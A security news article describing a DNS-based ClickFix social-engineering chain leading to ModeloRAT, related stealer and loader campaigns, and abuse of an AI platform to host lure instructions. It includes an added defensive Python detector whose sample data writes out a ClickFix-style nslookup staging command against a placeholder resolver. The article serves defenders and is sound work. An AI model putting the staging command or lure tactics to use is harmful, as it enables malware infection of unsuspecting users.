Microsoft has uncovered a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing a DNS lookup command to retrieve malicious payloads. The campaign demonstrates how threat actors continue refining ClickFix methods to bypass traditional security defenses.
How the DNS-Based ClickFix Variant Works
In this newly observed attack chain, victims are instructed to run a command via the Windows Run dialog. The command launches cmd.exe and uses the nslookup utility to perform a Domain Name System query against a hard-coded external DNS server instead of the system’s default resolver.
According to Microsoft Threat Intelligence, the DNS response is filtered to extract the “Name:” record, which is then executed as the second-stage payload. By using DNS as a lightweight staging mechanism, attackers reduce reliance on conventional web-based requests and blend malicious traffic with routine network activity.
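As an added defensive example (not code from Microsoft's report or this article), the following Python triages constructed process-creation records for the pattern just described: nslookup run with an explicit resolver instead of the system default, its output filtered for "Name:", and cmd.exe launched from explorer.exe as the Run dialog would do. The tab-separated key=value record layout, field names, domains and addresses are assumptions for the example.

```python
import re

# Constructed sample process-creation events in a simplified Sysmon-like
# tab-separated key=value layout (assumed, not Microsoft's telemetry).
# Domains and addresses are documentation placeholders, not real indicators.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\cmd.exe\t"
    "CommandLine=cmd.exe /c nslookup update.example.invalid 203.0.113.53 ^| findstr Name:",
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "Image=C:\\Windows\\System32\\nslookup.exe\tCommandLine=nslookup mail.example.com",
    "ParentImage=C:\\Windows\\System32\\cmd.exe\tImage=C:\\Windows\\System32\\nslookup.exe\t"
    "CommandLine=nslookup -type=mx example.com 8.8.8.8",
]

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# Arguments that follow nslookup up to the next shell operator (pipe, &, caret).
NSLOOKUP_ARGS = re.compile(r"nslookup(?:\.exe)?\s+([^|&^]*)", re.IGNORECASE)


def parse_event(line):
    """Split 'k=v<TAB>k=v' into a dict; values may themselves contain '='."""
    return dict(f.split("=", 1) for f in line.split("\t") if "=" in f)


def analyze(event):
    """Score one event for the DNS-staged ClickFix pattern; returns (score, reasons)."""
    cmd = event.get("CommandLine", "")
    parent, image = event.get("ParentImage", "").lower(), event.get("Image", "").lower()
    reasons = []
    m = NSLOOKUP_ARGS.search(cmd)
    if not m:
        return 0, reasons
    reasons.append("nslookup invoked")
    # Positional args: first is the name queried; a second one overrides the resolver.
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    if len(positional) >= 2:
        kind = "IP literal" if IPV4.fullmatch(positional[1]) else "hostname"
        reasons.append(f"explicit resolver {positional[1]} ({kind}) instead of system default")
    if re.search(r"name:", cmd, re.IGNORECASE):
        reasons.append("response filtered for 'Name:' (second-stage extraction)")
    if parent.endswith("\\explorer.exe") and image.endswith("\\cmd.exe"):
        reasons.append("cmd.exe spawned by explorer.exe (Run dialog / user-typed command)")
    return len(reasons), reasons


def triage(lines, threshold=3):
    """Return (command line, reasons) for events scoring at or above the threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = analyze(ev)
        if score >= threshold:
            hits.append((ev.get("CommandLine", ""), reasons))
    return hits
```

A lone nslookup with a chosen server is routine admin work and scores low; the alert fires only when the resolver override, the "Name:" filter and the Run-dialog parent chain coincide.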
ClickFix attacks typically rely on phishing emails, malicious advertisements, or compromised websites. Victims are redirected to fake CAPTCHA pages or troubleshooting instructions that convince them to manually execute commands in Windows or macOS terminals. Because users infect their own machines, this technique frequently bypasses endpoint security controls.

Over the past two years, ClickFix has expanded into several variants, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
Malware Chain Leading to ModeloRAT
After the DNS lookup retrieves the payload, the infection chain continues with the download of a ZIP archive from azwsappdev[.]com. Inside the archive, a malicious Python script executes reconnaissance commands and deploys a Visual Basic Script responsible for launching ModeloRAT, a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the attackers create a Windows shortcut file in the Startup folder that points to the malicious VBScript, ensuring the malware runs every time the system boots.
Lumma Stealer and CastleLoader Activity Surge
The disclosure comes amid rising activity involving Lumma Stealer, a widely distributed information-stealing malware. Security researchers have linked recent campaigns to CastleLoader, a malware loader associated with a threat actor known as GrayBravo.
CastleLoader performs checks for virtualization environments and security software before decrypting and launching Lumma Stealer directly in memory. In addition to ClickFix-based distribution, attackers use cracked software sites and pirated movie downloads as bait, disguising malware as legitimate installers or media files.
Another loader, RenEngine Loader, has also been used to spread Lumma Stealer since early 2025. Often disguised as game cheats or pirated tools such as CorelDRAW, RenEngine deploys a secondary loader called Hijack Loader, which ultimately installs the stealer. Data indicates infections have impacted users across Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.

Expanding ClickFix Ecosystem Across Platforms
Security researchers report multiple campaigns using ClickFix-style lures to deliver various malware families:
- macOS campaigns distributing Odyssey Stealer, a rebranded version of Poseidon Stealer derived from Atomic macOS Stealer, targeting browser wallet extensions and desktop crypto wallets.
- Fake CAPTCHA pages on compromised websites deploying StealC malware on Windows systems.
- Phishing emails containing malicious SVG files that trigger PowerShell execution and deploy the .NET infostealer Stealerium.
- Abuse of AI platforms such as Anthropic Claude to host malicious ClickFix instructions shared through sponsored search results, leading to Atomic Stealer and MacSync Stealer infections.
- Fake technical articles impersonating Apple Support that trick macOS users into executing terminal commands.
- ClearFake campaigns leveraging compromised WordPress sites and EtherHiding techniques via blockchain infrastructure to deliver Lumma Stealer.

Researchers emphasize that ClickFix succeeds because it exploits procedural trust rather than software vulnerabilities. The instructions appear similar to legitimate troubleshooting steps, making victims unaware that they are executing malicious code.
Rising Threat to macOS and Cryptocurrency Users
Recent analysis highlights that macOS systems are increasingly targeted by infostealers, especially those focusing on cryptocurrency theft. Attackers often acquire valid Apple developer signatures to bypass security mechanisms such as Gatekeeper.
Security experts warn that the long-standing belief that Macs are immune to malware is outdated and risky. Organizations should monitor for unusual terminal activity, unauthorized data exfiltration from browser storage or Keychain, and suspicious blockchain-related network connections.
As ClickFix techniques continue evolving, defenders must remain vigilant against social engineering campaigns that combine DNS abuse, malware loaders, and cross-platform infostealers.